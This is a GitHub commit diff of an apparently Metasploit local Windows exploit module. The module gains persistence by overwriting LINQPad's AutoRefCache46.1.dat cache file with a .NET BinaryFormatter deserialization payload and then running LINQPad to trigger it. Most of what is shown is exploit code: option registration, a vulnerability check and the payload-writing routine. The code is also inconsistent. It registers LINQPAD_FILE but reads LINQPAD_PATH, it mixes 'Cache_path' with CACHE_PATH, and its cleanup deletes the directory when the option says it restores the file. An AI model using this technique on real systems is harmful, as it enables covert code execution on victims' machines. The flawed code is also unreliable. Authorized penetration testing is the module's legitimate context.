Skip to content

Commit 2f351ea

Browse files
msutovsky-r7msutovsky-r7
committed
Addressing some issues
1 parent 93c2360 commit 2f351ea

File tree

2 files changed

+13
-93
lines changed

2 files changed

+13
-93
lines changed

modules/exploits/windows/local/linqpad_deserialization.rb

Lines changed: 0 additions & 85 deletions
This file was deleted.

modules/exploits/windows/local/linqpad_deserialization_persistence.rb

Lines changed: 13 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -48,21 +48,22 @@ def initialize(info = {})
4848
)
4949
)
5050
register_options([
51-
OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]),
52-
OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data'])
51+
OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
52+
OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
53+
OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish'])
5354
])
5455
end
5556

5657
# Simplify pulling the writable directory variable
5758

5859
def check
59-
if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path'])
60+
if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH'])
6061
return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
61-
elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat')
62+
elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
6263
return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
63-
elsif !file?(datastore['cache_path'] + '/autorefcache46.1.dat')
64+
elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
6465
return Exploit::CheckCode::Unknown('Cannot find cache file')
65-
elsif file?(datastore['cache_path'] + '/autorefcache46.2.dat')
66+
elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat')
6667
return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad')
6768
else
6869
return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable')
@@ -77,9 +78,13 @@ def exploit
7778
formatter: :BinaryFormatter
7879
)
7980
# try to overwrite cache file
80-
fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload)
81+
fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload)
8182

8283
# run LINQPad and trigger deserialization
83-
fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPad_path'])
84+
fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPAD_PATH'])
85+
86+
# add cleanup option
87+
register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP']
88+
8489
end
8590
end

0 commit comments

Comments
 (0)